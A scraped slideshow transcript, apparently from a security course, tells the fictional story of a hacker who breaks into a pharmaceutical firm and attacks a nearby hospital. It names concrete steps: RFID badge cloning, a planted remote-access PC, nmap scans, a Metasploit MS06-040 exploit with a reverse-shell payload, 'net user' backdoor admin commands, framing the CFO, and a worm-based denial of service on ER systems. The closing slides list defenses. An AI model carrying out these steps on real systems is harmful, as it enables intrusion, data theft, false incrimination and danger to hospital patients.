Presentation is loading. Please wait.

Presentation is loading. Please wait.

Corporate Espionage.  Comptetitor of Alki Pharmaceuticals wants to get any technical information or research  Not have the hack traced back  Launch.

Similar presentations

Presentation on theme: "Corporate Espionage.  Comptetitor of Alki Pharmaceuticals wants to get any technical information or research  Not have the hack traced back  Launch."— Presentation transcript:

1 Corporate Espionage

2  Comptetitor of Alki Pharmaceuticals wants to get any technical information or research  Not have the hack traced back  Launch a disabling attack on the hospital across from Alki ◦ Critical services impacted, resulting in patient death  “Contractor” threatened hacker’s girlfriend ◦ Eight weeks allowed for the hack

3  1999$25 Billion ◦ US Chamber of Commerce survey  2003$89 Billion from the Fortune 1000 companies ◦ Pricewaterhouse Coopers and ASIS survey (American Society for Industrial Security)  2007$100 Billion plus

4  Reconnaissance  Physical Access  Executing the Hacks  DoS of Hospital  Other “stuff”

5  Google search ◦ “intext:alki pharmaceuticals”  Mentions software vendor for Alki  Get info from vendor’s webpage  Technical documentation  Type of servers  Ports  Technical forum  SA from Alki complaining about software’s restrictions  Physical recon ◦ Employees have RFID badges  ◦ EDGAR search on publicly traded corporations

6  Python libraries for reading RFID devices  Readers are available for purchase ◦ Depending on standard, anywhere from $50 to $1000  A writer will clone a valid RFID device  Phoenix met official of Alki ◦ Got physically close enough to read her badge ◦ Now has access to every place the CFO is allowed

7  CFO takes “prospective employee” on tour ◦ Observes which areas are carded ◦ Reads cards of 15 employees  Remembering the order of cards being read and locations ◦ Will attempt to get a janitor’s RFID card as well

8  Mini-PC with Vista ◦ VMWare  Running Knoppix Live CD ISO ◦ Integrated CDMA-EVO cellular card ◦ Integrated 10/100 Ethernet NIC  Phoenix hopes to plant the mini-PC physically at Alki ◦ Get IP via DHCP ◦ Connect to Internet using the cellular card  Using Hotmail account traceable back to Alki employee (backup email account points back to the employee) ◦ Set up GoToMyPC trial account  Physical intrusion set for when janitors start night services

9  Phoenix takes elevator (using cloned CFO’s card) and enters the NOC room ◦ Uses card to enter the NOC room  No biometrics in place! ◦ Racks are neatly labeled indicating which units are R&D switches

10  Phoenix plugs patch cable into an open port on R&D switch ◦ Attaches the mini-PC to the switch  Gets an IP via DHCP  Boots up the Knoppix Live CD ISO under VMWare  Ifconfig reveals a supplied IP address of  Going back to the host OS (Vista), he fires up the CDMA software  GoToMyPC is connected to the Internet ◦ Secretes the mini-PC and the power supply ◦ Takes a wireless access point, with an Alki inventory control tag and leaves

11  On the train going home Phoenix uses a CDMA connection on his laptop to verify a connection ◦ Brings up a web browser ◦ Utilizing the CFO’s bogus account, logs into ◦ Connects to the planted mini-PC in the Alki NOC room

12  On returning home, reconnects using GoToMyPC ◦ Goes to the VMWare and in the shell starts up Nmap  nmap ◦ Shows the hosts and which ports are listening on these hosts   Shows port 12345, which was the port the R&D server listens on (info developed through passive intel gathering)  nmap –A –p 12345  Attempts to uncover the OS  Response is either XP / SP2 or Windows Server 2003  Directory Services ports are open  Probably Windows Server 2003 host

13  Recalling complaints about vendor’s software being incapable of working with SP1 ◦  Search for SP1 fixes  MS06-040netapi32.dll ex;oitable  Uses Metasploit to see if there’s an available exploit use windows/smb/ms06_040_netapi ◦ Gets the Metasploit prompt msf exploit(ms06_040_netapi)>

14  At the Metasploit prompt set PAYLOAD generic/shell_reverse_tcp set RHOST set LHOST  Phoenix now sees the following on his screen C:\WINDOWS\system32>  Phoenix has access to the target system!

15  Phoenix is on the target system with Local System privilege ◦ Higher that Administrator!!!  Once on the target system Phoenix enters the following commands at the prompt ◦ net user linda alki$$ /ADD  (Linda is the CFO) ◦ net localgroup administrators linda /ADD

16  Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER ◦ gets IP address ◦ Plugs in the stolen Alki wireless access point ◦ Resets the AP to factory defaults  Configures it to support DHCP ◦ Verifies that he can connect via the AP ◦ Jacks the laptop into Ethernet port  Runs nmap  Response is 12 hosts  Possibly all in ER due to proximity  Maps out the OS on each host  Results go to ADS text file  Nmap -A > c:\OSDetect.txt:ads.txt

17  The laptop was purchased with cash with false information supplied at a computer “superstore” ◦ Laptop loaded with viruses, virus construction kit, recon tools, etc  Using the laptop ◦ Phoenix logged into the Hotmail account (posing as CFO from Alki)  Leaving the “remember me” settings on  Making investigators’ job easier ◦ Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs ◦ Visited websites, leaving history on PC  Verifies that the rouge access point functions from outside the hospital

18  R&D server partitions mapped out ◦ C:system partition ◦ D:data partition, shared by researchers  Over a network connection a network share is established to a 1TB drive attached ◦ Windows “Backup” of D: target system to the 1 TB drive  Physical entry back into Alki NOC room ◦ Using the mini-PC and Remote Desktop  Data partition deleted from D:  Windows system directory deleted from C:

19  From coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes “wshwc.exe” ◦ Windows Scripting Host Worm Construction program

20  WSHWC ◦ Names the work Alkibot ◦ Payload option: Launch Denial of Service Attack ◦ Creates a separate worm for each of the 7 Unix (Solaris) hosts identified using nmap  These.vbs files, along with 5 additional.vbs files for the other Windows boxes are saved in the laptop  Bat file constructed to execute the.vbs files sequentially ◦ Executes the bat file

21  News reports ◦ ER monitoring units (Solaris systems) were not able to send data out  Resulted in cardiac arrest of 1 patient  Incorrect medication prescribed to another patient  Drips ran out for two other patients ◦ Alki executive arrested (CFO) ◦ Alki stock value sharply down ◦ Alki competitor announced they were ahead of schedule in release of drug

22  Breach of confidentiality of employee information  Creation of backdoors, shell account ◦ Sell these  Access to Alki’s banking information (Accounting dept.)  Stock manipulation

23  Detailed tech info of Alki software uncovered by going to vendor’s site  RFID attack assisted in gaining physical access to Alki ◦ Bolstered by social engineering  Nmap scan identified Alki R&D server  used to uncover potential exploits for the server  Metasploit used to invoke the exploit  Windows Backup used to copy R&D data remotely using network share  Delete of data (getting rid of evidence, causing diversion)  Hotmail account set up to implicate CFO  Set up rogue AP in hospital, lauched DoS attack

24  Physical security ◦ Single factor access to restricted areas  Implement multi-layer measures ◦ Note: Encryption of the RFID means nothing if it’s cloned as the attacker does not need to “read” the data, just use it ◦ Cameras / CCTV should be used ◦ Access device should not also be the ID card  ID card is visible, RFID device should be in a shielded carrier ◦ Disable open ports on a switch

25  Scanning attack ◦ Turn off ICMP ◦ Turn on Windows Firewall  Simple nmap scans would come back with no results  Possible to get results, just more complex scans ◦ Client IDS  Cisco Security Agent (CSA)  Detects SYN stealth scans, for example  Perhaps make it impossible to determine which host was the R&D server

26  Social Engineering ◦ Training! ◦ Policies ◦ Testing of policies  OS attacks ◦ Patching  Pressure vendor to fix application to work with later release of OS which is patched  Consider another software solution (dump the vendor)  Data theft ◦ encryption

Download ppt "Corporate Espionage.  Comptetitor of Alki Pharmaceuticals wants to get any technical information or research  Not have the hack traced back  Launch."

Similar presentations

Ads by Google